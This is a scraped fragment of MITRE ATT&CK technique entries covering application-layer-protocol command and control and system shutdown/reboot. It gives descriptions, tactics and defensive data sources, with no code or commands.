Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre